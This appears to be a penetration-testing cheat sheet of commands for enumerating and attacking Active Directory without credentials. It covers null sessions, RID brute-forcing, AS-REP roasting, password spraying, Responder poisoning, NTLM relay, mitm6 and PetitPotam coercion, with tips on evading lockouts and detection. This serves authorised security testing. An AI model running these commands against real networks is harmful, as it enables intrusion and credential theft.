Unauthenticated Enumeration

Everything you can pull from an AD environment without a single credential. Network discovery, null sessions, guest access, and protocol-level enumeration.

Sections Unauthenticated Enumeration

Network Discovery

Ping sweep to find live hosts on the subnet.

terminal.log
root@localhost:~# nmap -sn <SUBNET>/24 -oA discovery

Fast full port scan across the range.

terminal.log
root@localhost:~# masscan -p1-65535 <SUBNET>/24 --rate=1000 -oL ports.txt

Targeted service scan on common AD ports.

terminal.log
root@localhost:~# nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,5986,9389 <TARGET> -oA ad_services

Discover SMB-enabled hosts with NetExec (also reveals hostnames, domain name, OS version, and signing status).

terminal.log
root@localhost:~# nxc smb <SUBNET>/24

Discover WinRM-enabled hosts.

terminal.log
root@localhost:~# nxc winrm <SUBNET>/24

Discover MSSQL instances.

terminal.log
root@localhost:~# nxc mssql <SUBNET>/24

Discover RDP-enabled hosts.

terminal.log
root@localhost:~# nxc rdp <SUBNET>/24
Tip
The initial nxc smb sweep is your best first command. Domain name, DC hostname, SMB signing status, and OS version in one shot.

Null & Guest Session Checks

SMB

Test null session. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u '' -p ''

Test guest access. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u 'guest' -p ''

LDAP

Test anonymous LDAP bind. [LDAP]

terminal.log
root@localhost:~# ldapsearch -H ldap://<DC_IP> -x -b 'DC=domain,DC=local'
Tip
If null bind works, you can enumerate users, groups, and OUs without any credentials at all.

RPC

Test null session via RPC. [RPC]

terminal.log
root@localhost:~# rpcclient -U '' -N <DC_IP> -c 'enumdomusers'
Tip
RPC null sessions are hit or miss on modern DCs. Always try it, but don’t count on it.

SMB Enumeration (No Creds)

Share Enumeration

List shares via null session. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u '' -p '' --shares

List shares with guest access. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u 'guest' -p '' --shares

User Enumeration

Enumerate domain users via RID brute-forcing (works if null session is allowed). [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u '' -p '' --rid-brute 10000

RID brute with guest. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u 'guest' -p '' --rid-brute 10000
Tip
RID brute-forcing is one of the most reliable unauthenticated user enumeration methods. Bump the range to 10000 or higher to catch service accounts with high RIDs.

Password Policy

Enumerate password policy (check before spraying). [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u '' -p '' --pass-pol

With guest. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u 'guest' -p '' --pass-pol
Tip
Always pull the password policy before spraying. You need the lockout threshold and observation window to stay under the radar.

SMB Signing

Identify hosts with SMB signing disabled (relay targets). [SMB]

terminal.log
root@localhost:~# nxc smb <SUBNET>/24 --gen-relay-list relay_targets.txt
Tip
Hosts with SMB signing disabled go straight into your ntlmrelayx target list. Run this early.

LDAP Enumeration (No Creds)

These only work if the DC allows anonymous LDAP binds.

Enumerate base naming context. [LDAP]

terminal.log
root@localhost:~# ldapsearch -H ldap://<DC_IP> -x -s base namingContexts

Dump users (anonymous). [LDAP]

terminal.log
root@localhost:~# ldapsearch -H ldap://<DC_IP> -x -b 'DC=domain,DC=local' '(objectClass=user)' sAMAccountName

Dump groups (anonymous). [LDAP]

terminal.log
root@localhost:~# ldapsearch -H ldap://<DC_IP> -x -b 'DC=domain,DC=local' '(objectClass=group)' cn

Dump computers (anonymous). [LDAP]

terminal.log
root@localhost:~# ldapsearch -H ldap://<DC_IP> -x -b 'DC=domain,DC=local' '(objectClass=computer)' cn dNSHostName

RPC Enumeration (No Creds)

Enumerate domain users. [RPC]

terminal.log
root@localhost:~# rpcclient -U '' -N <DC_IP> -c 'enumdomusers'

Enumerate domain groups. [RPC]

terminal.log
root@localhost:~# rpcclient -U '' -N <DC_IP> -c 'enumdomgroups'

Get domain password policy. [RPC]

terminal.log
root@localhost:~# rpcclient -U '' -N <DC_IP> -c 'getdompwinfo'

Look up SIDs to find the domain SID. [RPC]

terminal.log
root@localhost:~# rpcclient -U '' -N <DC_IP> -c 'lsaquery'

Enumerate printers (check for PrinterBug). [RPC]

terminal.log
root@localhost:~# rpcclient -U '' -N <DC_IP> -c 'enumprinters'

DNS Enumeration

Zone transfer attempt (rarely works, but always worth trying). [DNS]

terminal.log
root@localhost:~# dig axfr <DOMAIN_FQDN> @<DC_IP>

Reverse lookup sweep to map IPs to hostnames.

terminal.log
root@localhost:~# nmap -sn <SUBNET>/24 -oG - | awk '/Up/{print $2}' | while read ip; do nslookup "$ip" <DC_IP> 2>/dev/null; done
Tip
DNS zone transfers are almost always blocked on DCs, but it costs nothing to try. If it works, you get the full record set for free.

Kerberos Enumeration (No Creds)

Username Enumeration

Enumerate valid usernames via Kerberos (fast, no lockout risk). [Kerberos]

terminal.log
root@localhost:~# kerbrute userenum -d <DOMAIN_FQDN> --dc <DC_IP> usernames.txt
Tip
Kerberos user enumeration doesn’t trigger logon events the same way SMB does. Use a good wordlist (e.g., xato-net-10-million-usernames.txt, combined with common AD naming conventions like first.last).

AS-REP Roasting

Extract AS-REP hashes for accounts with Kerberos pre-auth disabled. [Kerberos]

terminal.log
root@localhost:~# impacket-GetNPUsers <DOMAIN>/ -dc-ip <DC_IP> -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt

Auto-enumerate users via LDAP if null bind is allowed. [Kerberos]

terminal.log
root@localhost:~# impacket-GetNPUsers <DOMAIN>/ -dc-ip <DC_IP> -request -format hashcat -outputfile asrep_hashes.txt

Crack with hashcat (mode 18200).

terminal.log
root@localhost:~# hashcat -m 18200 asrep_hashes.txt wordlist.txt

Password Spraying

Spray a single password against discovered usernames. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u users.txt -p '<PASSWORD>' --continue-on-success

Kerberos-based password spray (doesn’t trigger typical logon events). [Kerberos]

terminal.log
root@localhost:~# kerbrute passwordspray -d <DOMAIN_FQDN> --dc <DC_IP> users.txt '<PASSWORD>'
Tip
Kerberos spraying is stealthier than SMB spraying. Always pair with the password policy you pulled earlier to avoid lockouts.

Poisoning & Relay (No Creds)

LLMNR / NBT-NS / mDNS Poisoning

Capture NTLMv2 hashes on the local network.

terminal.log
root@localhost:~# responder -I eth0 -dwPv
Tip
Use -A for analyze mode first to see traffic without poisoning.

SMB Relay

Relay captured NTLM auth to hosts with SMB signing disabled.

terminal.log
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support

Relay to LDAP for creating a machine account or setting RBCD. [LDAP]

terminal.log
root@localhost:~# impacket-ntlmrelayx -t ldap://<DC_IP> --delegate-access

IPv6 DNS Poisoning

Poison IPv6 DNS via WPAD and relay to LDAP. [IPv6] [LDAP]

terminal.log
# Terminal 1 (poison)
root@localhost:~# mitm6 -d <DOMAIN_FQDN>

# Terminal 2 (relay to LDAP)
root@localhost:~# impacket-ntlmrelayx -6 -t ldaps://<DC_IP> --delegate-access -wh wpad.<DOMAIN_FQDN>
Tip
mitm6 + ntlmrelayx to LDAP is devastating. Can create machine accounts and set RBCD for instant lateral movement without ever having credentials.

Unauthenticated Coercion

Coerce authentication from unpatched DCs using PetitPotam (no creds). [MS-EFSRPC]

terminal.log
root@localhost:~# python3 PetitPotam.py <LISTENER_IP> <DC_IP>
Tip
Unauthenticated PetitPotam was patched, but many environments are still behind. Always try it.